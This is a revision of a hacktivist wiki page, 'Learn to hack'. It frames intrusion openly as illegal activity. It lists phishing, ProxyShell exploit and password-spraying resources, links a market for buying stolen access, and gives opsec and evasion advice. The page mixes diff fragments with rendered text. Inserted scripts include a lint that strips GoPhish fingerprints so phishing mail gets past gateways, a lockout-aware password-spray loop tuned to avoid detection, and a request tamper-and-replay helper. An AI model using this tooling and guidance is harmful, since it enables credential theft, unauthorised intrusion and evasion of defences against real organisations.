Learn to hack: Difference between revisions

From Enlace Hacktivista
* Automatic ProxyShell Exploit: https://github.com/Udyz/proxyshell-auto


== Initial Access ==


=== Phishing ===
There are many ways to get a foothold in a target's network: phishing, buying credential access, buying already-infected machines inside corporate networks, or hacking in. Here we list some resources for each.
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
* https://www.xanthus.io/mastering-the-simulated-phishing-attack
* https://github.com/Arno0x/EmbedInHTML
* https://github.com/L4bF0x/PhishingPretexts
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
* https://book.hacktricks.xyz/phishing-methodology
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* https://github.com/curtbraz/PhishAPI
* https://github.com/edoverflow/can-i-take-over-xyz
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
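The GoPhish item above says to strip the headers GoPhish adds before sending. The script below is an added example (not GoPhish's own code, nor from the linked article) that lints a message for those fingerprints before a campaign goes out. The header names (X-Mailer, X-Gophish-Contact, X-Gophish-Signature) and the tracking parameter (rid) are GoPhish's defaults as they appear in its source; treat them as an assumption and confirm against the build you run. Both sample messages are constructed.

```python
"""Pre-send lint for a phishing message: flag GoPhish's default fingerprints.

Added example, not GoPhish's own code. The header names and the `rid`
tracking parameter are GoPhish's defaults as assumed here; confirm them
against the version you actually run.
"""
import re
from email import message_from_string
from email.message import Message
from urllib.parse import parse_qs, urlparse

# Assumed default fingerprints (see module docstring).
FINGERPRINT_HEADERS = ("x-mailer", "x-gophish-contact", "x-gophish-signature")
FINGERPRINT_PARAM = "rid"
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def lint_message(raw: str) -> list:
    """Return one finding per fingerprint seen; an empty list means none."""
    msg: Message = message_from_string(raw)
    findings = []
    for name, value in msg.items():
        if name.lower() in FINGERPRINT_HEADERS:
            findings.append(f"header {name}: {value}")
    # Check every URL in the text parts for the default tracking parameter.
    for part in msg.walk():
        if part.get_content_type() not in ("text/plain", "text/html"):
            continue
        charset = part.get_content_charset() or "utf-8"
        body = part.get_payload(decode=True).decode(charset, "replace")
        for url in URL_RE.findall(body):
            if FINGERPRINT_PARAM in parse_qs(urlparse(url).query):
                findings.append(f"tracking param {FINGERPRINT_PARAM}: {url}")
    return findings


# Constructed sample messages (not real campaign mail).
STOCK_MESSAGE = """\
From: helpdesk@example.test
To: user@example.test
Subject: Password expiry notice
X-Mailer: gophish
X-Gophish-Contact: ops@example.test
Content-Type: text/plain; charset="utf-8"

Your password expires today. Reset it here:
https://portal.example.test/login?rid=AbCdEf1
"""

CLEANED_MESSAGE = """\
From: helpdesk@example.test
To: user@example.test
Subject: Password expiry notice
Content-Type: text/plain; charset="utf-8"

Your password expires today. Reset it here:
https://portal.example.test/login?t=AbCdEf1
"""

if __name__ == "__main__":
    for label, m in (("stock", STOCK_MESSAGE), ("cleaned", CLEANED_MESSAGE)):
        print(label, lint_message(m) or "no fingerprints")
```

Run it against a rendered test send of every template before launch; a single leftover header or the default parameter name is enough for a mail gateway rule to drop the whole campaign.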


=== Password spraying ===
For more information on gaining a foothold, see [[Initial Access Tactics, techniques and procedures]]
* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying/
* https://github.com/blacklanternsecurity/TREVORspray
* https://github.com/x90skysn3k/brutespray
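The tools listed above all implement the same loop, and the one thing that loop has to get right is the domain lockout policy. The following is an added example (not the code of any tool above) of a lockout-aware spraying loop: one password against every user per round, paced so that no account reaches the lockout threshold inside the observation window. The target is a constructed in-memory directory with an AD-style lockout counter (threshold 5, 30-minute reset window, three made-up users) so the logic runs offline; in practice `auth` would be the real logon call (OWA/EWS, Microsoft 365, a VPN portal) and `sleep` would be `time.sleep`.

```python
"""Lockout-aware password spray loop, added here as an example.

Not the code of MSOLSpray, TREVORspray or brutespray. The directory, users,
passwords and lockout policy are constructed so the example runs offline.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Set, Tuple


@dataclass
class LockoutPolicy:
    threshold: int    # bad attempts before the account locks (assumed 5)
    window_sec: int   # "reset account lockout counter after" (assumed 30 min)


@dataclass
class FakeDirectory:
    """Constructed target. `now` is a simulated clock advanced by sleep()."""
    creds: Dict[str, str]
    policy: LockoutPolicy
    now: float = 0.0
    bad: Dict[str, Tuple[int, float]] = field(default_factory=dict)  # user -> (count, last bad)
    locked: Set[str] = field(default_factory=set)

    def authenticate(self, user: str, password: str) -> bool:
        if user in self.locked:
            return False
        count, last = self.bad.get(user, (0, float("-inf")))
        if self.now - last >= self.policy.window_sec:
            count = 0                      # counter resets once the window has elapsed
        if self.creds.get(user) == password:
            self.bad[user] = (0, last)     # a successful logon resets badPwdCount
            return True
        count += 1
        self.bad[user] = (count, self.now)
        if count >= self.policy.threshold:
            self.locked.add(user)
        return False

    def sleep(self, seconds: float) -> None:
        self.now += seconds


def spray(users: List[str], passwords: List[str], auth: Callable[[str, str], bool],
          policy: LockoutPolicy, sleep: Callable[[float], None],
          rounds_per_window: Optional[int] = None) -> List[Tuple[str, str]]:
    """One password per round across all users. After `rounds_per_window`
    rounds (default threshold-2, leaving margin for the users' own typos)
    wait out the observation window before trying the next password."""
    budget = rounds_per_window or max(1, policy.threshold - 2)
    found = []
    for i, pw in enumerate(passwords):
        for u in users:
            if auth(u, pw):
                found.append((u, pw))
        if (i + 1) % budget == 0 and i + 1 < len(passwords):
            sleep(policy.window_sec)
    return found


def make_target() -> FakeDirectory:
    # Constructed users; two use guessable seasonal/common passwords.
    return FakeDirectory(
        creds={"alice": "Winter2023!", "bob": "Password1", "carol": "x7#Qe9!vLp2$"},
        policy=LockoutPolicy(threshold=5, window_sec=1800),
    )


CANDIDATES = ["Winter2023!", "Spring2023!", "Password1", "Summer2023!", "Welcome1"]


def run_paced() -> Tuple[List[Tuple[str, str]], Set[str]]:
    d = make_target()
    found = spray(list(d.creds), CANDIDATES, d.authenticate, d.policy, d.sleep)
    return found, d.locked


def run_unpaced() -> Tuple[List[Tuple[str, str]], Set[str]]:
    # Same candidates with no pause: the user whose password is not in the
    # list collects five failures at once and is locked out.
    d = make_target()
    found = spray(list(d.creds), CANDIDATES, d.authenticate, d.policy, d.sleep,
                  rounds_per_window=len(CANDIDATES))
    return found, d.locked


if __name__ == "__main__":
    print("paced:", run_paced())
    print("unpaced:", run_unpaced())
```

Read the policy first (`net accounts /domain`, or the Azure AD smart lockout settings for M365) rather than guessing it; the unpaced run shows what happens when the budget is wrong, and a wave of locked accounts is both a denial of service for the target and the loudest possible detection signal.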
 
=== Buying Access ===
* https://genesis.market/
 
=== CVE POCs ===
* https://github.com/nomi-sec/PoC-in-GitHub


== Scanning and Recon ==

Revision as of 13:55, 15 January 2023

This page aims to compile high-quality resources for hackers. All books listed on this page can be found on Library Genesis and Z-Library.

General Resources

Resources that assume little to no background knowledge:

Resources that assume minimal tech background:

Resources that assume a tech or hacking background:

Practice labs:

General references:

Active Directory

Tools

Office 365 & Azure

Tools

GSuite

https://www.slideshare.net/dafthack/ok-google-how-do-i-red-team-gsuite

C2 Frameworks

Antivirus & EDR Evasion

VMware

RocketChat

Microsoft Exchange

ProxyLogon is dead. It's mitigated by Defender. ProxyShell is not. AMSI catches unmodified public exploits.

Initial Access

There are many ways to get a foothold in a target's network: phishing, buying credential access, buying already-infected machines inside corporate networks, or hacking in. Here we list some resources for each.

For more information on gaining a foothold, see Initial Access Tactics, techniques and procedures

Scanning and Recon

Search Engines

Search engines are a useful tool for gathering information and intelligence from publicly available sources. Some are paid, some are free. Keep good OPSEC whenever you pay for any service that will be used for recon against a target.

For more information on recommended search engines, see Search Engines Resources

Web Crawlers

Wordlists

OSINT

Open-source intelligence (OSINT) refers to the collection and analysis of information from publicly available sources to be used in an intelligence context.

For more information on recommended tools and resources, see OSINT Tools and Resources

API Hacking

Intercepting Proxies

These let you view, edit, and replay requests, and are extremely useful for finding vulnerabilities in web applications.
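The view/edit/replay cycle described above is, mechanically, parse the request, change any part of it, re-serialise it with correct framing, and send the bytes again. The block below is an added example of that cycle, not code from Burp, ZAP or mitmproxy; the captured request, host names and field values are constructed. It shows the detail that bites people who edit requests by hand: Content-Length has to be recomputed after the body changes, or the server reads a truncated or over-long body.

```python
"""Parse / edit / re-serialise an HTTP request the way an intercepting proxy
does before replaying it. Added example, not Burp/ZAP/mitmproxy code; the
captured request and the edited values are constructed.
"""
from dataclasses import dataclass
from typing import List, Tuple
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


@dataclass
class Request:
    method: str
    target: str                     # request-target including query string
    version: str
    headers: List[Tuple[str, str]]  # ordered, original case kept
    body: bytes


def parse_request(raw: bytes) -> Request:
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return Request(method, target, version, headers, body)


def serialize(req: Request) -> bytes:
    """Re-emit the request. Content-Length is always recomputed from the
    (possibly edited) body so the server never sees a stale length."""
    headers = [(n, v) for n, v in req.headers if n.lower() != "content-length"]
    if req.body or req.method in ("POST", "PUT", "PATCH"):
        headers.append(("Content-Length", str(len(req.body))))
    head = f"{req.method} {req.target} {req.version}\r\n"
    head += "".join(f"{n}: {v}\r\n" for n, v in headers)
    return head.encode("iso-8859-1") + b"\r\n" + req.body


def set_header(req: Request, name: str, value: str) -> None:
    req.headers = [(n, v) for n, v in req.headers if n.lower() != name.lower()]
    req.headers.append((name, value))


def set_query_param(req: Request, key: str, value: str) -> None:
    parts = urlsplit(req.target)
    q = dict(parse_qsl(parts.query, keep_blank_values=True))
    q[key] = value
    req.target = urlunsplit(parts._replace(query=urlencode(q)))


def set_form_field(req: Request, key: str, value: str) -> None:
    """Edit one field of an application/x-www-form-urlencoded body."""
    q = dict(parse_qsl(req.body.decode("iso-8859-1"), keep_blank_values=True))
    q[key] = value
    req.body = urlencode(q).encode("iso-8859-1")


# Constructed capture: a form POST as a browser would send it.
_BODY = b"to=acct-1001&amount=10&memo=x"
CAPTURED = (
    b"POST /api/transfer?debug=0 HTTP/1.1\r\n"
    b"Host: app.example.test\r\n"
    b"Cookie: session=abc123\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: " + str(len(_BODY)).encode() + b"\r\n\r\n" + _BODY
)


def tamper(raw: bytes) -> bytes:
    """Typical edits made in a proxy before replay; the values are illustrative."""
    req = parse_request(raw)
    set_form_field(req, "amount", "999999")          # does the server trust the client's amount?
    set_query_param(req, "debug", "1")               # does a hidden flag change behaviour?
    set_header(req, "X-Forwarded-For", "127.0.0.1")  # does an IP allowlist trust this header?
    return serialize(req)


if __name__ == "__main__":
    print(tamper(CAPTURED).decode("iso-8859-1"))
```

The bytes `tamper()` returns are exactly what would be written to the upstream socket for the replay; diff the edited request against the original before sending so that the only changes are the ones you intended.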

Opsec

Operational security (Opsec) is crucial for protecting oneself from surveillance and maintaining anonymity while conducting illegal activities.

Recommended Measures

Any illegal activity should be done from an encrypted and separate computer or virtual machine, with all traffic over Tor.

For more information on recommended measures, see Opsec Measures

Secure Messaging

Best practice for secure messaging includes using connections over Tor and end-to-end encryption for messages.

Recommended Applications

For Jabber/XMPP, make sure to enable OTR or OMEMO encryption. For email, use PGP. For file sharing, use OnionShare.

For more information on recommended applications, see Secure Messaging Applications